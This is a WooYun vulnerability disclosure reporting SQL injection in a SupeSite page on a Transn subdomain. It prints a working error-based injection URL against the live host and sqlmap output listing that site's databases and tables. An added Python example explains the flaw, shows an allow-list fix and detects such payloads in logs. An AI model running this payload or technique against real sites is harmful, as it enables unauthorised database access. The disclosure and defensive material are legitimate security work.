
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0134543

Title: SQL injection on a Transn (传神) site (7 databases affected)

Vendor: transn.com

Author: 路人甲

Submitted: 2015-08-17 11:17

Fix time: 2015-08-22 11:18

Disclosed: 2015-08-22 11:18

Type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: vendor notified, but the vendor ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-17: details sent to the vendor, awaiting the vendor's handling
2015-08-22: the vendor chose to ignore the report; details disclosed to the public

Summary:

As titled.

Details:

The site runs SupeSite, and the injection point is batch.common.php. Judging by the payload, under action=modelquote the name parameter is spliced into the statement as a table name without validation: the trailing # (%23) comments out the remainder of the original query, and updatexml() is handed a deliberately malformed XPath expression so that MySQL echoes the result of the injected subquery (md5(521521) as a marker, wrapped in 0x5e24, i.e. "^$") in its error message.

http://cat.transn.com/batch.common.php?action=modelquote&cid=1&name=members%20where%201=1%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(521521)),0x5e24),1))%23


From there, straight to sqlmap.
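An added example, not code from the report and not SupeSite's own code: it models the defect the payload reveals (a request parameter spliced into the FROM clause as a table name), shows the allow-list check that identifiers need because a table name cannot be bound as a query parameter, and runs a small detector for error-based payloads over constructed access-log lines. The query shape, the supe_ prefix, the allow-list and the log lines are assumptions made for illustration.

```python
# Added example (not from the original WooYun report and not SupeSite's own code).
# It models the defect the report points at: a request parameter ("name") spliced
# into the FROM clause as a table name, so the value
#   members where 1=1 and 1=(updatexml(1,concat(0x5e24,(select md5(521521)),0x5e24),1))#
# turns a lookup into an error-based extraction. Query shape, table prefix and the
# allow-list of model tables are assumptions made for illustration.
import re
from urllib.parse import unquote

TABLE_PREFIX = "supe_"                                   # assumed prefix; not from the report
ALLOWED_MODELS = {"members", "models", "modelcolumns"}   # assumed allow-list

# The reporter's "name" value, URL-decoded.
REPORT_PAYLOAD = unquote(
    "members%20where%201=1%20and%201=(updatexml(1,concat(0x5e24,"
    "(select%20md5(521521)),0x5e24),1))%23"
)


def build_query_vulnerable(name: str, cid: int) -> str:
    """Mirrors the defect: the table name is interpolated verbatim."""
    return f"SELECT * FROM {TABLE_PREFIX}{name} WHERE cid={int(cid)} LIMIT 1"


def effective_sql(sql: str) -> str:
    """What MySQL actually parses once a '#' comment has eaten the rest of the line.
    Illustration only: it does not know about '#' inside string literals."""
    return sql.split("#", 1)[0].rstrip()


def build_query_safe(name: str, cid: int) -> str:
    """Identifiers cannot be bound as parameters, so the table name is checked
    against a fixed allow-list; cid is left as a placeholder for the driver to bind."""
    if name not in ALLOWED_MODELS:
        raise ValueError(f"unknown model table: {name!r}")
    return f"SELECT * FROM `{TABLE_PREFIX}{name}` WHERE cid=%s LIMIT 1"


# Detection side: error-based MySQL injection leaves recognisable tokens in the
# request line even when the response body is not logged.
ERROR_BASED = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)
HEX_MARKER = re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]{2,}", re.IGNORECASE)
REQUEST_TARGET = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed access-log lines (Apache combined style) for the example.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Aug/2015:11:17:01 +0800] "GET /batch.common.php?action=modelquote'
    '&cid=1&name=members HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [17/Aug/2015:11:17:05 +0800] "GET /batch.common.php?action=modelquote'
    '&cid=1&name=members%20where%201=1%20and%201=(updatexml(1,concat(0x5e24,'
    '(select%20md5(521521)),0x5e24),1))%23 HTTP/1.1" 500 1024 "-" "Mozilla/5.0"',
]


def flag_error_based_sqli(lines):
    """Return the decoded request targets that carry updatexml/extractvalue or a
    concat(0x..) marker. Decoding twice also catches double-encoded payloads."""
    hits = []
    for line in lines:
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        target = unquote(unquote(m.group(1)))
        if ERROR_BASED.search(target) or HEX_MARKER.search(target):
            hits.append(target)
    return hits


if __name__ == "__main__":
    vuln = build_query_vulnerable(REPORT_PAYLOAD, 1)
    print("as built:  ", vuln)
    print("as parsed: ", effective_sql(vuln))
    try:
        build_query_safe(REPORT_PAYLOAD, 1)
    except ValueError as exc:
        print("rejected:  ", exc)
    for hit in flag_error_based_sqli(SAMPLE_LOG):
        print("flagged:   ", hit)
```

The XPATH syntax error that updatexml() raises carries at most 32 characters of the offending expression, which is why a short marker such as md5(521521) is a convenient first probe and why longer values are read out in slices; the 0x5e24 wrapper just makes the marker easy to pick out of the error text.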


Proof:

--dbs

available databases [7]:
[*] icatweb
[*] information_schema
[*] tcatwebsite
[*] test
[*] test_entwcat
[*] test_translib
[*] test_wattapi




--tables -D "icatweb"


Database: icatweb
[256 tables]
+-------------------------+
| [Table]access |
| [Table]activities |
| [Table]activityapplies |
| [Table]addons |
| [Table]adminactions |
| [Table]admincustom |
| [Table]admingroups |
| [Table]adminnotes |
| [Table]adminsession |
| [Table]adminsessions |
| [Table]ads |
| [Table]advertisements |
| [Table]announcements |
| [Table]attachmentfields |
| [Table]attachments |
| [Table]attachmenttypes |
| [Table]attachpaymentlog |
| [Table]attachtypes |
| [Table]banned |
| [Table]bbcodes |
| [Table]blocks |
| [Table]cache_0 |
| [Table]cache_1 |
| [Table]cache_2 |
| [Table]cache_3 |
| [Table]cache_4 |
| [Table]cache_5 |
| [Table]cache_6 |
| [Table]cache_7 |
| [Table]cache_8 |
| [Table]cache_9 |
| [Table]cache_a |
| [Table]cache_b |
| [Table]cache_c |
| [Table]cache_d |
| [Table]cache_e |
| [Table]cache_f |
| [Table]cache |
| [Table]caches |
| [Table]categories |
| [Table]channels |
| [Table]click |
| [Table]clickgroup |
| [Table]clickuser |
| [Table]creditlog |
| [Table]creditrule |
| [Table]creditslog |
| [Table]crons |
| [Table]customfields |
| [Table]debateposts |
| [Table]debates |
| [Table]failedlogins |
| [Table]faqs |
| [Table]favoriteforums |
| [Table]favorites |
| [Table]favoritethreads |
| [Table]feeds |
| [Table]forumfields |
| [Table]forumlinks |
| [Table]forumrecommend |
| [Table]forums |
| [Table]friendlinks |
| [Table]imagetypes |
| [Table]invites |
| [Table]itempool |
| [Table]magiclog |
| [Table]magicmarket |
| [Table]magics |
| [Table]medallog |
| [Table]medals |
| [Table]memberfields |
| [Table]membermagics |
| [Table]memberrecommend |
| [Table]members |
| [Table]memberspaces |
| [Table]modelcolumns |
| [Table]modelfolders |
| [Table]modelinterval |
| [Table]models |
| [Table]moderators |
| [Table]modworks |
| [Table]mytasks |
| [Table]navs |
| [Table]onlinelist |
| [Table]onlinetime |
| [Table]orders |
| [Table]pages |
| [Table]paymentlog |
| [Table]pluginhooks |
| [Table]plugins |
| [Table]pluginvars |
| [Table]polloptions |
| [Table]polls |
| [Table]postitems |
| [Table]postlog |
| [Table]postmessages |
| [Table]postposition |
| [Table]posts |
| [Table]postset |
| [Table]prefields |
| [Table]profilefields |
| [Table]projects |
| [Table]promotions |
| [Table]prompt |
| [Table]promptmsgs |
| [Table]prompttype |
| [Table]ranks |
| [Table]ratelog |
| [Table]regips |
| [Table]relatedthreads |
| [Table]reportlog |
| [Table]reports |
| [Table]request |
| [Table]rewardlog |
| [Table]robotitems |
| [Table]robotlog |
| [Table]robotmessages |
| [Table]robots |
| [Table]rss |
| [Table]rsscaches |
| [Table]searchindex |
| [Table]sessions |
| [Table]settings |
| [Table]sitemaplogs |
| [Table]smilies |
| [Table]spacecaches |
| [Table]spacecomments |
| [Table]spaceitems |
| [Table]spacenews |
| [Table]spacepages |
| [Table]spacetags |
| [Table]stats |
| [Table]statvars |
| [Table]styles |
| [Table]stylevars |
| [Table]survey |
| [Table]tagcache_d |
| [Table]tagcache |
| [Table]tags |
| [Table]tasks |
| [Table]taskvars |
| [Table]templates |
| [Table]threads |
| [Table]threadsmod |
| [Table]threadtags |
| [Table]threadtypes |
| [Table]tradecomments |
| [Table]tradelog |
| [Table]tradeoptionvars |
| [Table]trades |
| [Table]typemodels |
| [Table]typeoptions |
| [Table]typeoptionvars |
| [Table]typevars |
| [Table]usergroups |
| [Table]userlog |
| [Table]validating |
| [Table]warnings |
| [Table]words |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
| uchome_ad |
| uchome_adminsession |
| uchome_album |
| uchome_appcreditlog |
| uchome_blacklist |
| uchome_block |
| uchome_blog |
| uchome_blogfield |
| uchome_cache |
| uchome_class |
| uchome_click |
| uchome_clickuser |
| uchome_comment |
| uchome_config |
| uchome_creditlog |
| uchome_creditrule |
| uchome_cron |
| uchome_data |
| uchome_docomment |
| uchome_doing |
| uchome_event |
| uchome_eventclass |
| uchome_eventfield |
| uchome_eventinvite |
| uchome_eventpic |
| uchome_feed |
| uchome_friend |
| uchome_friendguide |
| uchome_friendlog |
| uchome_invite |
| uchome_log |
| uchome_magic |
| uchome_magicinlog |
| uchome_magicstore |
| uchome_magicuselog |
| uchome_mailcron |
| uchome_mailqueue |
| uchome_member |
| uchome_mtag |
| uchome_mtaginvite |
| uchome_myapp |
| uchome_myinvite |
| uchome_notification |
| uchome_pic |
| uchome_picfield |
| uchome_poke |
| uchome_poll |
| uchome_pollfield |
| uchome_polloption |
| uchome_polluser |
| uchome_post |
| uchome_profield |
| uchome_profilefield |
| uchome_report |
| uchome_session |
| uchome_share |
| uchome_show |
| uchome_space |
| uchome_spacefield |
| uchome_spaceinfo |
| uchome_spacelog |
| uchome_stat |
| uchome_statuser |
| uchome_tag |
| uchome_tagblog |
| uchome_tagspace |
| uchome_task |
| uchome_thread |
| uchome_topic |
| uchome_topicuser |
| uchome_userapp |
| uchome_userappfield |
| uchome_userevent |
| uchome_usergroup |
| uchome_userlog |
| uchome_usermagic |
| uchome_usertask |
| uchome_visitor |
+-------------------------+


Suggested fix:

I'm just here for the gift!

Copyright notice: when reposting, credit the source 路人甲@乌云


Responses

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-08-22 11:18

Vendor reply:

Rank: 4 (WooYun assessment)

Latest status:

None